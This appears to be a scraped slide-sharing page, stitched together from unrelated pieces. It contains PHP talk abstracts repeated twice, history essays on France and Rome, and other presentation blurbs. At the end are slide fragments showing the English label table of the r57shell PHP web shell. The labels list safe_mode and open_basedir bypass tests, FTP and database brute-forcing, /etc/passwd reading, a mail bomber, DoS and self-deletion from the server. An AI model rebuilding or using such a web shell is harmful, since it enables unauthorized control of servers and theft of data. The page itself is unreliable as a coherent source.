The PHP code is for a shell called r57shell. It checks for bots, sets variables and configuration options, defines arrays of useful/dangerous commands and files, handles authentication, and generates the HTML interface for the shell.
As presented at Dutch PHP Conference 2015, an introduction to command buses, how to implement your own in PHP and why they're both useful but unimportant.
Closing keynote, as presented at Codemotion 2014, LaraconEU 2014, Redevelop 2014, CodeConnexx 2013 and PHP North East 2014.
This presentation makes a reference to a reading list I received. For those interested, the release consists of most of the general classics, such as Gang Of Four "Design Patterns", The Pragmatic Programmer, Structure and Interpretation of Computer Programs, Domain Driven Design and a few others. The actual list remains tucked away in a box somewhere.
Models and Service Layers, Hemoglobin and HobgoblinsRoss Tuck
As presented at ZendCon 2014, AmsterdamPHP, PHPBenelux 2014, Sweetlake PHP and PHP Northwest 2013, an overview of some different patterns for integrating and managing logic throughout your application.
With over 3400 available built-in function, PHP offers a tremendously rich environment. Yet, some of these functions are still unknown to most programmers. During this session, Damien Seguy will highlight a number of functions that are rarely used in PHP, but are nonetheless useful and available within standard distributions.
This session introduces most well known design patterns to build PHP classes and objects that need to store and fetch data from a relational databases. The session will describe the difference between of the Active Record, the Table and Row Data Gateway and the Data Mapper pattern. We will also examine some technical advantages and drawbacks of these implementations. This talk will expose some of the best PHP tools, which ease database interactions and are built on top of these patterns.
As presented at Dutch PHP Conference 2015, an introduction to command buses, how to implement your own in PHP and why they're both useful but unimportant.
Closing keynote, as presented at Codemotion 2014, LaraconEU 2014, Redevelop 2014, CodeConnexx 2013 and PHP North East 2014.
This presentation makes a reference to a reading list I received. For those interested, the release consists of most of the general classics, such as Gang Of Four "Design Patterns", The Pragmatic Programmer, Structure and Interpretation of Computer Programs, Domain Driven Design and a few others. The actual list remains tucked away in a box somewhere.
Models and Service Layers, Hemoglobin and HobgoblinsRoss Tuck
As presented at ZendCon 2014, AmsterdamPHP, PHPBenelux 2014, Sweetlake PHP and PHP Northwest 2013, an overview of some different patterns for integrating and managing logic throughout your application.
With over 3400 available built-in function, PHP offers a tremendously rich environment. Yet, some of these functions are still unknown to most programmers. During this session, Damien Seguy will highlight a number of functions that are rarely used in PHP, but are nonetheless useful and available within standard distributions.
This session introduces most well known design patterns to build PHP classes and objects that need to store and fetch data from a relational databases. The session will describe the difference between of the Active Record, the Table and Row Data Gateway and the Data Mapper pattern. We will also examine some technical advantages and drawbacks of these implementations. This talk will expose some of the best PHP tools, which ease database interactions and are built on top of these patterns.
Persistence is one of the most important part in a PHP project. Persisting data to a database came with PHP/FI and its MySQL support. From native extensions and PHP4 database abstraction libraries to PDO and modern ORM frameworks, you will (re)discover how persistence has evolved during the last decade. This talk will also introduce the future of data persistence with the growing success of alternative storage engines.
Teaching Your Machine To Find FraudstersIan Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Symfony2 - extending the console componentHugo Hamon
The goal of this session is to explain how to take benefit from the Symfony2 command line interface tool. First, I have a closer look at the most interesting commands to generate code and help you reduce your development time. Then, I will show you how to create your own commands to extend the Symfony CLI tool and automate your tedious and redundant tasks. This part of the talk will also explain how to create interactive tasks, interact with the database, generating links or send emails from the command line. Of course, there will be a focus on how to design your commands the best way to make them as much testable as possible.
Presentation made at GTA meetup in 2012-02-07.
Object Calisthenics is a set of exercise rules to reach better code, maintainable, testable and readable.
A lot of people using PHPunit for testing their source code. While I was observing my team
I recognized most of them are only using the standard ssertions like 'assertEquals()' or
'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
Adding Dependency Injection to Legacy ApplicationsSam Hennessy
Dependency Injection (DI) is a fantastic technique, but what if you what to use dependency injection in your legacy application. Fear not! As someone who as done this very thing, I will show how you can successful and incrementally add DI to any application. I will present a number of recipes and solutions to common problems and give a tour of the various PHP DI projects and how they can help.
How do you measure the quality of your code? Performance and testing are just one aspect of code, in order to meet deadlines and make maintenance quicker you also need your code to be readable, decoupled and generally easier to comprehend and work with. This talk will go over tips and exercises to help you identify trouble areas, refactor them and train you to write better code in future projects. Come make your code look and function better.
Code smell is any symptom in the source code of a program that possibly indicates a deeper problem.
So let's see what are code smell we can remove from our code.
PHP Data Objects (PDO) provides a clear, simple (but powerful), unified API for working with all our favorite databases. Features include prepared statements with bound parameters (for all databases, even those that don’t natively support them), transactions, cursors, LOBs, and flexible error handling.
Persistence is one of the most important part in a PHP project. Persisting data to a database came with PHP/FI and its MySQL support. From native extensions and PHP4 database abstraction libraries to PDO and modern ORM frameworks, you will (re)discover how persistence has evolved during the last decade. This talk will also introduce the future of data persistence with the growing success of alternative storage engines.
Teaching Your Machine To Find FraudstersIan Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Symfony2 - extending the console componentHugo Hamon
The goal of this session is to explain how to take benefit from the Symfony2 command line interface tool. First, I have a closer look at the most interesting commands to generate code and help you reduce your development time. Then, I will show you how to create your own commands to extend the Symfony CLI tool and automate your tedious and redundant tasks. This part of the talk will also explain how to create interactive tasks, interact with the database, generating links or send emails from the command line. Of course, there will be a focus on how to design your commands the best way to make them as much testable as possible.
Presentation made at GTA meetup in 2012-02-07.
Object Calisthenics is a set of exercise rules to reach better code, maintainable, testable and readable.
A lot of people using PHPunit for testing their source code. While I was observing my team
I recognized most of them are only using the standard ssertions like 'assertEquals()' or
'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
Adding Dependency Injection to Legacy ApplicationsSam Hennessy
Dependency Injection (DI) is a fantastic technique, but what if you what to use dependency injection in your legacy application. Fear not! As someone who as done this very thing, I will show how you can successful and incrementally add DI to any application. I will present a number of recipes and solutions to common problems and give a tour of the various PHP DI projects and how they can help.
How do you measure the quality of your code? Performance and testing are just one aspect of code, in order to meet deadlines and make maintenance quicker you also need your code to be readable, decoupled and generally easier to comprehend and work with. This talk will go over tips and exercises to help you identify trouble areas, refactor them and train you to write better code in future projects. Come make your code look and function better.
Code smell is any symptom in the source code of a program that possibly indicates a deeper problem.
So let's see what are code smell we can remove from our code.
PHP Data Objects (PDO) provides a clear, simple (but powerful), unified API for working with all our favorite databases. Features include prepared statements with bound parameters (for all databases, even those that don’t natively support them), transactions, cursors, LOBs, and flexible error handling.
n 2010, I told everyone how to start unit testing Zend Framework applications. In 2011, let’s take this a step further by testing services, work flows and performance. Looking to raise the bar on quality? Let this talk be the push you need to improve your Zend Framework projects.
With Extbase - a new framework for extension development introduced in TYPO3 4.3 - you are able to develop with the paradigms of FLOW3 today. During this talk, you get in touch with the features of the framework to understand how it supports your development process to develop clean code cost efficient in less time. Extbase is one cornerstone for a smooth transition to TYPO3 v5, another is reusable business domain knowledge in form of Generic Domain Models available in 4.x and 5.x. The Generic Domain Models will enable you to add a Semantic Web topping.
Presentation held at London XQuery Meetup in September 2011. In general, it shows how Web Scraping has naturally evolved towards XQuery. Additionally, it discusses different obstacles in scraping websites. A live example is shown as proof of solving these problems using XQuery.
Internationalizing CakePHP ApplicationsPierre MARTIN
Slides from the talk given by Mariano Iglesias during the CakeFest #3 - July 2009
Note: the original pdf and the code related to this talk can be found on cakephp.org (http://cakephp.org/downloads/CakeFest/CakeFest%203%20-%20Berlin%202009/Mariano%20Iglesias%20-%20Internationalizing%20CakePHP%20Applications)
The French Revolution, which began in 1789, was a period of radical social and political upheaval in France. It marked the decline of absolute monarchies, the rise of secular and democratic republics, and the eventual rise of Napoleon Bonaparte. This revolutionary period is crucial in understanding the transition from feudalism to modernity in Europe.
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The Roman Empire A Historical Colossus.pdfkaushalkr1407
The Roman Empire, a vast and enduring power, stands as one of history's most remarkable civilizations, leaving an indelible imprint on the world. It emerged from the Roman Republic, transitioning into an imperial powerhouse under the leadership of Augustus Caesar in 27 BCE. This transformation marked the beginning of an era defined by unprecedented territorial expansion, architectural marvels, and profound cultural influence.
The empire's roots lie in the city of Rome, founded, according to legend, by Romulus in 753 BCE. Over centuries, Rome evolved from a small settlement to a formidable republic, characterized by a complex political system with elected officials and checks on power. However, internal strife, class conflicts, and military ambitions paved the way for the end of the Republic. Julius Caesar’s dictatorship and subsequent assassination in 44 BCE created a power vacuum, leading to a civil war. Octavian, later Augustus, emerged victorious, heralding the Roman Empire’s birth.
Under Augustus, the empire experienced the Pax Romana, a 200-year period of relative peace and stability. Augustus reformed the military, established efficient administrative systems, and initiated grand construction projects. The empire's borders expanded, encompassing territories from Britain to Egypt and from Spain to the Euphrates. Roman legions, renowned for their discipline and engineering prowess, secured and maintained these vast territories, building roads, fortifications, and cities that facilitated control and integration.
The Roman Empire’s society was hierarchical, with a rigid class system. At the top were the patricians, wealthy elites who held significant political power. Below them were the plebeians, free citizens with limited political influence, and the vast numbers of slaves who formed the backbone of the economy. The family unit was central, governed by the paterfamilias, the male head who held absolute authority.
Culturally, the Romans were eclectic, absorbing and adapting elements from the civilizations they encountered, particularly the Greeks. Roman art, literature, and philosophy reflected this synthesis, creating a rich cultural tapestry. Latin, the Roman language, became the lingua franca of the Western world, influencing numerous modern languages.
Roman architecture and engineering achievements were monumental. They perfected the arch, vault, and dome, constructing enduring structures like the Colosseum, Pantheon, and aqueducts. These engineering marvels not only showcased Roman ingenuity but also served practical purposes, from public entertainment to water supply.
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdfTechSoup
In this webinar you will learn how your organization can access TechSoup's wide variety of product discount and donation programs. From hardware to software, we'll give you a tour of the tools available to help your nonprofit with productivity, collaboration, financial management, donor tracking, security, and more.
The Art Pastor's Guide to Sabbath | Steve ThomasonSteve Thomason
What is the purpose of the Sabbath Law in the Torah. It is interesting to compare how the context of the law shifts from Exodus to Deuteronomy. Who gets to rest, and why?
Instructions for Submissions thorugh G- Classroom.pptxJheel Barad
This presentation provides a briefing on how to upload submissions and documents in Google Classroom. It was prepared as part of an orientation for new Sainik School in-service teacher trainees. As a training officer, my goal is to ensure that you are comfortable and proficient with this essential tool for managing assignments and fostering student engagement.
Synthetic Fiber Construction in lab .pptxPavel ( NSTU)
Synthetic fiber production is a fascinating and complex field that blends chemistry, engineering, and environmental science. By understanding these aspects, students can gain a comprehensive view of synthetic fiber production, its impact on society and the environment, and the potential for future innovations. Synthetic fibers play a crucial role in modern society, impacting various aspects of daily life, industry, and the environment. ynthetic fibers are integral to modern life, offering a range of benefits from cost-effectiveness and versatility to innovative applications and performance characteristics. While they pose environmental challenges, ongoing research and development aim to create more sustainable and eco-friendly alternatives. Understanding the importance of synthetic fibers helps in appreciating their role in the economy, industry, and daily life, while also emphasizing the need for sustainable practices and innovation.
48. 'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Use',
'eng_text21'=>' New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_text30'=>'Cat file',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text36'=>'Database . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
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49. 'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_text44'=>'Can't edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
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50. 'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group
name or GIDrn- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'server:port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without arch.',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can't get users list',
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51. 'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'/etc/passwd',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (user -> resu)',
'eng_text102'=>'Mail',
'eng_text103'=>'Send email',
'eng_text104'=>'Send file to email',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
'eng_text116'=>'Copy from',
'eng_text117'=>'to',
'eng_text118'=>'File copied',
'eng_text119'=>'Cant copy file',
'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
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52. 'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
'eng_text125'=>'Data',
'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
'eng_text128'=>'Modify/Access file (touch)',
'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
'eng_text134'=>'Database-bruteforce',
'eng_text135'=>'Dictionary',
'eng_text136'=>'Creating evil symlink',
'eng_text137'=>'Useful',
'eng_text138'=>'Dangerous',
'eng_text139'=>'Mail Bomber',
'eng_text140'=>'DoS',
'eng_text141'=>'Danger! Web-daemon crash possible.',
'eng_text142'=>'Downloaders',
'eng_text143'=>'Temp: ',
'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
'eng_text146'=>'Max Interation',
'eng_text147'=>'',
'eng_text148'=>'',
'eng_text149'=>'',
'eng_text150'=>'',
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